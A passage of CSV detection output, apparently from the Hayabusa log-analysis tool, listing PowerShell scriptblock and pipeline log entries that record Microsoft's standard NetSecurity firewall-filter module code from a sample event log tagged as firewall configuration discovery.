$__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallInterfaceTypeFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallInterfaceTypeFilter' function Set-NetFirewallInterfaceTypeFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType] ${InterfaceType}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallInterfaceTypeFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallInterfaceTypeFilter'",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.879 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-Command): ""Get-Command"" ParameterBinding(Get-Command): name=""Module""; value=""Microsoft.PowerShell.Core"" ParameterBinding(Get-Command): name=""Name""; value=""Set-StrictMode""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.879 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.879 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Collections.Generic.Dictionary[string,string]""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.879 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.879 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallInterfaceTypeFilter""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.879 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallInterfaceTypeFilter""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.879 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.879 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Get-NetFirewallInterfaceTypeFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] param( [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType[]] ${InterfaceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('InterfaceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InterfaceType}) $__cmdletization_queryBuilder.FilterByProperty('InterfaceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallInterfaceTypeFilter.cmdletDefinition.cdxml-Help.xml }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.879 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Set-NetFirewallInterfaceTypeFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType] ${InterfaceType}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallInterfaceTypeFilter.cmdletDefinition.cdxml-Help.xml }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.879 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log," 1.0.0.0 NetFirewallSecurityFilter ",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.879 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 if ($(Microsoft.PowerShell.Core\Get-Command Set-StrictMode -Module Microsoft.PowerShell.Core)) { Microsoft.PowerShell.Core\Set-StrictMode -Off } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = 'Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter' $script:PrivateData = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.Dictionary[string,string]' Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallSecurityFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] param( [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication[]] ${Authentication}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption[]] ${Encryption}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${OverrideBlockRules}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${LocalUser}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteUser}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteMachine}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Authentication') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Authentication}) $__cmdletization_queryBuilder.FilterByProperty('Authentication', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Encryption') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Encryption}) $__cmdletization_queryBuilder.FilterByProperty('Encryption', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OverrideBlockRules') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OverrideBlockRules}) $__cmdletization_queryBuilder.FilterByProperty('OverrideBlockRules', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalUser') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalUser}) $__cmdletization_queryBuilder.FilterByProperty('LocalUsers', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteUser') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteUser}) $__cmdletization_queryBuilder.FilterByProperty('RemoteUsers', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteMachine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteMachine}) $__cmdletization_queryBuilder.FilterByProperty('RemoteMachines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterBySecurity', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = 